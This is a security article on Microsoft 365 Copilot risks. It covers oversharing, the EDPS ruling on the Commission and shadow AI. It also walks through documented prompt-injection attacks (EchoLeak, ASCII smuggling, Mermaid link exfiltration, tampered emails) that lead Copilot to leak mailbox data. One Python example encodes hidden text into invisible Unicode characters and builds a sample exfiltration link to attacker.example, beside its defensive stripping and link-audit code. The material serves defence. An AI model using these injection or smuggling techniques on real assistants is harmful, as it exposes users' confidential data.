Copilot Security Risk: When AI Assistant Leaks Corporate Secrets
Microsoft 365 Copilot had a zero-click vulnerability rated CVSS 9.3. The European Data Protection Supervisor has reprimanded the EU Commission for its use of M365. And 34 percent of German employees use AI tools outside corporate IT. Three facts, one problem: companies are rolling out AI assistants without first building the security architecture to support them.
Key Takeaways
- CVE-2025-32711 (EchoLeak): According to its discoverers at Aim Labs, the first documented zero-click vulnerability in a production AI system. CVSS 9.3. An attacker could exfiltrate data from another user's Copilot context without any user interaction; Microsoft fixed it server-side in May 2025 (Infosecurity Magazine, May 2025).
- EDPS reprimands EU Commission: In March 2024 the European Data Protection Supervisor found the EU Commission in breach of data-protection law when using M365—insufficient specification of data collection and missing transfer safeguards.
- 34 percent shadow AI in Germany: One in three employees uses generative AI with a private account outside corporate IT (Bitkom 2024). Only 23 percent of companies have policies for it.
- Oversharing is the biggest risk: Microsoft itself lists excessive permissions as the most common risk category in Copilot deployments. Copilot instantly turns existing permission errors into exploitable gaps.
- Gartner warns: By 2027, 40 percent of all AI data-breaches will stem from cross-border misuse of generative AI (Gartner, February 2025).
EchoLeak: The first zero-click AI vulnerability
Copilot is not a chatbot. It is a system that can reach every piece of data a user is permitted to see in SharePoint, OneDrive, Teams and Outlook, including data they were never meant to see but were technically granted access to. For IT-security teams that means every permission gap, every forgotten “Anyone” link and every orphaned workspace suddenly becomes reachable through an AI search engine. This article outlines the documented attack vectors, what Germany’s BSI recommends, and which steps must be completed before any Copilot rollout.
In January 2025 researchers at Aim Labs reported a flaw in Microsoft 365 Copilot that opened a new category: CVE-2025-32711, dubbed “EchoLeak.” CVSS score: 9.3 out of 10. The attack was an indirect prompt injection: a crafted email lands in the victim’s mailbox, and when the victim later asks Copilot a question for which that email is retrieved as context, Copilot follows the instructions hidden in it and leaks data from the victim’s Copilot context to the attacker. What made it unique: no click, no file open, no user interaction required beyond using Copilot as intended.
Microsoft fixed the flaw server-side in May 2025, before it was disclosed publicly; customers had nothing to patch. EchoLeak nonetheless marks a turning point: by Aim Labs’ account it was the first documented zero-click vulnerability in a production LLM application. For security teams that means AI assistants don’t just add new attack surfaces; they create surfaces that can be exploited without any involvement from the victim.
Prompt Injection: Four Documented Attack Vectors
EchoLeak isn’t the only documented attack vector. Since 2024, security researchers have uncovered multiple ways to manipulate Copilot—and Microsoft has had to patch each one.
ASCII Smuggling (Johann Rehberger, 2024): Rehberger showed that invisible Unicode Tag characters (the U+E0000 block) can hide arbitrary text inside an otherwise harmless hyperlink. One crafted email or document is enough: Copilot follows the indirect prompt injection it contains, collects data from the user’s mailbox (in the demo, MFA codes), and encodes it invisibly into a link. A single click by the user then sends the data to the attacker. Microsoft initially rated the finding “Low Severity” and fixed it only after a public demonstration at HITCON.
Mermaid Diagram Exfiltration (Truesec, September 2025): A manipulated Office document could make Copilot embed email contents in clickable links inside a Mermaid diagram it rendered. Microsoft’s fix was to disable interactive links in Mermaid diagrams entirely.
Confidential Label Bypass (January 2026): Copilot summarised emails in Sent Items and Drafts even though they carried confidentiality labels that should have excluded them, so the label-based DLP policies did not take effect. Microsoft released an emergency patch.
Indirect Prompt Injection via Email (Zenity, Black Hat 2024): Zenity’s CTO Michael Bargury showed at Black Hat USA 2024 that Copilot processes tampered emails automatically, without the victim ever opening them. In the demo, Copilot swapped the bank details in payment instructions and served a fake Microsoft login page.
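To make the ASCII-smuggling mechanism above concrete, here is an added example (my own illustration, not code from the article, from Rehberger’s research or from Microsoft). It encodes text into invisible Unicode Tag characters the way an attacker would, decodes them back, strips them before text is handed to a model, and audits markdown links in a rendered answer, the exfiltration sink shared by ASCII smuggling, EchoLeak and the Mermaid case, against an allow-list of hosts. The sample strings, the `attacker.example` and `contoso.sharepoint.com` hosts and the function names are constructed for illustration.

```python
"""Unicode Tag 'ASCII smuggling': encode, decode, strip and link audit.

Added example, not code from the article, from Rehberger or from Microsoft.
Hosts, strings and function names below are constructed for illustration.
"""
import re
from urllib.parse import urlparse

TAG_BASE = 0xE0000                    # Unicode Tags block: U+E0000 + ASCII code point
TAG_LANG, TAG_CANCEL = 0xE0001, 0xE007F
TAG_MIN, TAG_MAX = 0xE0020, 0xE007E   # printable ASCII 0x20..0x7E mapped into the block
ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF}  # other invisible characters worth stripping


def smuggle(text: str) -> str:
    """Attacker side: hide printable ASCII as invisible Tag characters."""
    for ch in text:
        if not 0x20 <= ord(ch) <= 0x7E:
            raise ValueError(f"{ch!r} is not printable ASCII and cannot be tag-encoded")
    return "".join(chr(TAG_BASE + ord(ch)) for ch in text)


def decode_tags(text: str) -> str:
    """Recover hidden ASCII from Tag characters; all other characters are ignored."""
    return "".join(chr(ord(ch) - TAG_BASE) for ch in text if TAG_MIN <= ord(ch) <= TAG_MAX)


def strip_invisible(text: str) -> str:
    """Defender side: drop Tag and zero-width characters before text reaches a model
    or a renderer, so hidden instructions and hidden payloads disappear together."""
    return "".join(
        ch for ch in text
        if not (TAG_LANG <= ord(ch) <= TAG_CANCEL or ord(ch) in ZERO_WIDTH)
    )


MD_LINK = re.compile(r"!?\[([^\]]*)\]\((\S+?)\)")  # markdown [label](url) or ![alt](url)


def audit_links(rendered: str, allowed_hosts: set) -> list:
    """Flag links in a model-generated answer that carry smuggled data or point
    outside the allow-listed hosts. Returns one dict per suspicious link."""
    findings = []
    for label, url in MD_LINK.findall(rendered):
        hidden = decode_tags(label) or decode_tags(url)
        host = (urlparse(strip_invisible(url)).hostname or "").lower()
        if hidden or host not in allowed_hosts:
            findings.append({"host": host, "hidden": hidden, "url": strip_invisible(url)})
    return findings


if __name__ == "__main__":
    payload = smuggle("MFA=123456")   # constructed secret the injection 'harvested'
    answer = f"Your invoice is ready: [open invoice](https://attacker.example/c?d={payload})"
    print(f"visible text: {strip_invisible(answer)}")
    for f in audit_links(answer, {"contoso.sharepoint.com"}):
        print(f"suspicious link to {f['host']}, hidden payload: {f['hidden']!r}")
```

The two defensive functions sit at different points of the pipeline: `strip_invisible` belongs on the way in (before retrieved mail or documents are handed to the model), `audit_links` on the way out (before an answer is rendered as clickable markdown). Stripping alone does not help against EchoLeak-style payloads that are assembled by the model itself, which is why the outbound host check is the more important of the two.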
“The BSI recommends conducting a risk analysis for the specific use case before integrating large language AI models into workflows.”
– BSI, Generative AI Models: Opportunities and Risks, paraphrased (May 2024)
Oversharing: The underestimated everyday risk
The spectacular vulnerabilities dominate the headlines. Yet the biggest Copilot risk is mundane: excessive permissions in SharePoint, OneDrive and Teams. Microsoft itself identifies oversharing as the most common risk category in Copilot deployments.
The issue: Copilot uses the existing permission model exactly as it stands. If a SharePoint folder was shared via an “Anyone” link, if orphaned workspaces still carry active permissions, if nested group memberships grant access to data the user never consciously saw, Copilot makes all of it searchable and summarisable in an instant.
Take this example: an employee asks Copilot, “What was discussed about Project Alpha last week?” Copilot scans every Teams chat, email and SharePoint document the user can access—including channels they never visited and folders they never opened. When permissions are too permissive, Copilot surfaces confidential information the user would never have found without it.
For German companies this is especially sensitive. Unlike in the U.S., where data access within a company is often handled liberally, the GDPR imposes strict requirements on purpose limitation and data minimisation. If Copilot summarises salary negotiations from an HR channel for a marketing employee because Teams permissions were too broad, that is not merely a security problem; it is a GDPR violation. The Bavarian and North Rhine-Westphalia regulators have already signalled that AI-assisted data processing will receive special scrutiny.
Microsoft’s own recommendation is unambiguous: before rolling out Copilot, clean up the permission model. The Oversharing Assessment Blueprint calls for enforcing least-privilege principles, regular permission reviews and SharePoint Advanced Management to identify risky sites. In practice, that means weeks to months of prep work before the first user should activate Copilot.
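To make the permission cleanup concrete, here is an added example (my own illustration, not Microsoft’s tooling and not the Blueprint). It triages a permission export for the patterns the section names, “Anyone” links, organisation-wide links, edit rights on broad links, links without expiry and orphaned sites with no owner, and orders sites for cleanup. The records are constructed and only loosely shaped like Microsoft Graph permission objects (`roles`, `link.scope`, `link.type`, `expirationDateTime`); the site ids, item names and `contoso.example` addresses are made up, and a real run would feed in an export from Graph or from SharePoint Advanced Management’s data access governance reports.

```python
"""Oversharing triage over a SharePoint/OneDrive permission export.

Added example, not Microsoft's own tooling. Records are constructed and only
loosely shaped like Microsoft Graph 'permission' objects (roles, link.scope,
link.type, expirationDateTime). Site ids, items and addresses are made up.
"""
from datetime import datetime, timezone

NOW = datetime(2026, 1, 15, tzinfo=timezone.utc)   # fixed clock so results are reproducible

# Constructed sample: site id -> current owners (empty list = orphaned workspace)
SITES = {
    "hr": ["hr-owner@contoso.example"],
    "alpha": [],
    "marketing": ["mkt-owner@contoso.example"],
}

# Constructed sample permission records
PERMISSIONS = [
    {"site": "hr", "item": "Salary-bands-2026.xlsx", "roles": ["read"],
     "link": {"scope": "organization", "type": "view"}, "expirationDateTime": None},
    {"site": "alpha", "item": "ProjectAlpha-Contract.docx", "roles": ["write"],
     "link": {"scope": "anonymous", "type": "edit"}, "expirationDateTime": None},
    {"site": "alpha", "item": "Alpha-pricing.xlsx", "roles": ["read"],
     "link": {"scope": "anonymous", "type": "view"},
     "expirationDateTime": "2025-01-01T00:00:00Z"},
    {"site": "marketing", "item": "Campaign.pptx", "roles": ["read"],
     "link": {"scope": "users", "type": "view"},
     "expirationDateTime": "2026-06-01T00:00:00Z"},
]

SEVERITY = {"critical": 3, "high": 2, "medium": 1, "info": 0}
BROAD = ("anonymous", "organization")   # scopes that are not tied to named people


def _parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00")) if ts else None


def classify(perm, now=NOW):
    """Findings (severity, reason) for one permission record."""
    link = perm.get("link") or {}
    scope, ltype = link.get("scope"), link.get("type")
    expires = _parse_ts(perm.get("expirationDateTime"))
    if expires and expires < now:
        return [("info", "expired link: confirm it was actually revoked")]
    findings = []
    if scope == "anonymous":
        findings.append(("critical", f"'Anyone' {ltype} link: no sign-in needed to reach the item"))
    elif scope == "organization":
        findings.append(("high", f"organisation-wide {ltype} link: any signed-in user with the link, "
                                 "and Copilot acting for them, can reach the item"))
    if "write" in perm.get("roles", []) and scope in BROAD:
        findings.append(("high", "broad link also grants edit rights"))
    if scope in BROAD and expires is None:
        findings.append(("medium", "broad link has no expiry"))
    return findings


def triage(permissions, sites, now=NOW):
    """Aggregate per site: sorted findings, orphaned flag and a numeric score
    so the cleanup can be ordered before Copilot is enabled. A site that appears
    in the export but not in the owner list is treated as orphaned."""
    report = {s: {"orphaned": not owners, "findings": [], "score": 0} for s, owners in sites.items()}
    for perm in permissions:
        entry = report.setdefault(perm["site"], {"orphaned": True, "findings": [], "score": 0})
        for sev, reason in classify(perm, now):
            entry["findings"].append((sev, perm["item"], reason))
            entry["score"] += SEVERITY[sev]
    for entry in report.values():
        if entry["orphaned"]:
            entry["findings"].append(("high", "*", "no site owner: nobody to review or revoke access"))
            entry["score"] += SEVERITY["high"]
        entry["findings"].sort(key=lambda f: -SEVERITY[f[0]])
    return report


def cleanup_order(report):
    """Site ids, highest score first."""
    return sorted(report, key=lambda s: -report[s]["score"])


if __name__ == "__main__":
    rep = triage(PERMISSIONS, SITES)
    for site in cleanup_order(rep):
        print(f"{site}: score {rep[site]['score']}, orphaned={rep[site]['orphaned']}")
        for sev, item, reason in rep[site]["findings"]:
            print(f"  [{sev}] {item}: {reason}")
```

The scoring is deliberately simple; what matters is that the report surfaces the three things the Blueprint asks you to fix first, broad links, edit rights on them and sites nobody owns, and that an expired link is not silently counted as safe until someone has confirmed it was revoked.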
EDPS Ruling: When the European Commission Itself Violates Data Protection Law
On 8 March 2024 the European Data Protection Supervisor (EDPS) officially determined that the European Commission breached EU data-protection Regulation 2018/1725 when deploying Microsoft 365. The core findings: insufficient specification of which personal data Microsoft collects and for what purposes, and a lack of adequate safeguards for transfers outside the EU/EEA.
The sanction was drastic: from 9 December 2024 all transfers of data to Microsoft outside the EU/EEA had to be suspended. The European Commission has since remedied the breaches—the EDPS closed the investigation in July 2025—but the ruling remains a precedent. If the Commission itself can fall foul of data-protection rules with Microsoft M365, what does that mean for a mid-sized company running the same software with far fewer resources?
For DACH enterprises this is a concrete call to action. Privacy lawyers strongly advise a data-protection impact assessment under Article 35 GDPR whenever Copilot is used. Microsoft has announced in-country data processing for Germany by November 2025, yet whether that fully dispels the GDPR concerns is hotly debated among legal scholars.
In November 2025 the BSI issued a specific warning on “evasion attacks on AI language models.” Its recommendations include precise system prompts, filtering harmful content out of third-party documents before they reach the model, and explicit user confirmation before any action an LLM executes. CERT-Bund has published Advisory WID-SEC-2025-1746 on M365 Copilot. For organisations subject to NIS2 or critical-infrastructure rules, these BSI recommendations are not optional; they form part of the duty of care whose breach can expose managing directors to personal liability.
Shadow AI: The Problem Growing Faster Than Policy
While IT departments deliberate Copilot roll-outs, employees have long taken matters into their own hands. According to Bitkom, 34 percent of German employees use generative AI tools with private accounts outside corporate IT. In 8 percent of companies shadow AI is widespread—a doubling versus last year—and only 23 percent of firms have defined rules for AI use.
Globally the picture is no brighter: a WalkMe survey of 12,000 knowledge workers found 60 percent use AI tools at work, yet only 18.5 percent know of an official AI policy from their employer. Thirty-eight percent share confidential data with AI platforms without approval.
Gartner forecasts that by 2030 more than 40 percent of global companies will experience security or compliance incidents caused by unauthorised AI tools. The 2027 outlook is sharper: 40 percent of all AI data-protection breaches will stem from cross-border misuse of generative AI.
Why Copilot Is More Dangerous Than ChatGPT
Many companies equate Copilot with ChatGPT, a chatbot for writing texts. That is a fundamental misunderstanding. ChatGPT works with the data the user types in. Copilot works with everything the user is permitted to access, including shared resources they have never opened and may not know exist.
The practical difference: if an employee feeds ChatGPT an internal document, that’s a conscious decision—problematic, but understandable. When Copilot autonomously scans emails, aggregates Teams chats, and summarizes SharePoint documents, it does so automatically and invisibly. Users often don’t even know which sources Copilot uses to assemble its answers.
This has consequences for the attack surface. With ChatGPT, an attacker must trick the user into submitting a manipulated prompt. With Copilot, it’s enough to send a tampered email or drop a doctored file into a shared folder. Copilot pulls the content on its own—that’s the mechanism the Zenity CTO demonstrated at Black Hat and which Johann Rehberger refined with ASCII Smuggling.
For security teams, this means: threat modeling for Copilot is fundamentally different than for other AI tools. Training users isn’t enough. You must secure the entire data landscape—because Copilot will find every gap and serve it to the user on a silver platter.
Microsoft recognized this and since late 2025 has offered in-country data processing for 15 countries, including Germany. That partially solves the data-transfer issue. But it doesn’t fix the oversharing problem or prevent prompt-injection attacks that occur within the tenant’s own boundaries.
What you must do before rolling out Copilot
1. Permission audit before rollout. Microsoft recommends SharePoint Advanced Management for systematic permission reviews. Eliminate “anyone” links, identify orphaned workspaces, and flatten nested group permissions. No Copilot access without a completed permission audit.
2. Deploy sensitivity labels everywhere. Apply Microsoft Purview Information Protection labels to every document and e-mail. Purview’s DLP controls for Copilot are built around labels: content that carries no label cannot be excluded from Copilot’s answers by those policies, so without labels there is no effective DLP control.
3. Configure DLP policies for Copilot. Since 2025 Microsoft Purview DLP explicitly supports the location “Microsoft 365 Copilot.” Skip this step and you unleash Copilot on company data without guardrails.
4. Pilot group before organisation-wide rollout. Limit the initial group to 50 users in a controlled environment. Monitor: which data is Copilot surfacing that it shouldn’t? Only scale once the answer is “none.”
5. Conduct a GDPR impact assessment. Article 35 GDPR requires a data-protection impact assessment when processing is likely to result in a high risk to individuals. An AI system that can reach all the company data a user is entitled to see meets that bar.
6. Establish an AI usage policy. Clear rules: which tools are allowed, which data may be entered, how shadow AI is handled. Bitkom figures show: without a policy, everyone does whatever they want.
The interplay of official Copilot rollouts and unofficial shadow AI creates a double attack surface. On one side, the controlled Copilot instances with their documented vulnerabilities. On the other, uncontrolled private AI tools into which employees feed customer data, contract details, and internal strategy papers—without audit, logging, or any chance of traceability. For CISOs this is a nightmare scenario: you cannot fully secure either the official or the unofficial AI channel.
“AI-driven attacks are, according to Gartner, the top emerging risk for companies—three quarters in a row.” – Gartner Q3 2024 Emerging Risks Survey, paraphrased
The crucial point: Copilot is not a security problem per se. It’s a multiplier. Organisations that have their permissions under control benefit. Those that don’t give an AI access to everything that’s poorly secured—and make it searchable, summarisable, and exportable. Preparing for Copilot isn’t an IT task; it’s a security task.
One final thought for context: Microsoft is not the enemy. Copilot is a productive tool that, with the right preparation, delivers real added value. But preparation is the key—and most companies underestimate the effort. The EchoLeak vulnerability, the EDPS ruling, and Bitkom’s shadow-AI figures all point the same way: organisations that roll out AI assistants without first putting permissions, data-protection architecture, and usage policies in order are acting negligently. And under NIS2, negligence in IT security can have personal consequences for senior management.
Frequently Asked Questions
Is Microsoft 365 Copilot unsafe?
Copilot itself isn’t inherently unsafe. It does, however, amplify existing permission problems—making data accessible that users would never have found without Copilot. Documented vulnerabilities (EchoLeak, ASCII Smuggling, label bypass) have been patched by Microsoft, yet they show the system remains attackable.
What is EchoLeak (CVE-2025-32711)?
The first documented zero-click vulnerability in a production AI system, according to Aim Labs, who reported it. CVSS score 9.3 out of 10. An attacker could exfiltrate data from a victim’s Copilot context without any action by the victim. Microsoft closed the gap server-side in May 2025.
What did the EDPS decide about Microsoft 365 usage?
In March 2024 the European Data Protection Supervisor ruled that the European Commission had violated data-protection law when using M365. The breaches were remediated by July 2025, yet the ruling remains a precedent for every EU organisation using M365.
Do I Need a GDPR Impact Assessment for Copilot?
Data-protection lawyers strongly recommend conducting a data-protection impact assessment under Art. 35 GDPR, since Copilot processes personal data and has broad access to corporate data. Microsoft’s Data Processing Addendum contains no specific provisions for AI/Copilot.
How Widespread Is Shadow AI in German Companies?
34 percent of German employees use generative-AI tools with private accounts that bypass corporate IT (Bitkom 2024). In 8 percent of firms, shadow AI is already widespread. Only 23 percent have formal rules for AI use.
What Must I Do Before Rolling Out Copilot?
At minimum: run a permissions audit in SharePoint, OneDrive and Teams; roll out sensitivity labels enterprise-wide; configure data-loss-prevention (DLP) policies for Copilot; perform a GDPR impact assessment; and establish an AI usage policy. Microsoft advises a pilot test with no more than 50 users.
Can Copilot Access Confidential E-Mails?
Yes—if the permissions allow it. In January 2026 a bug was documented in which Copilot accessed protected e-mails in Sent Items and Drafts despite confidentiality labels. Microsoft issued an emergency patch.
Source of cover image: Pexels / cottonbro studio (px:6153354)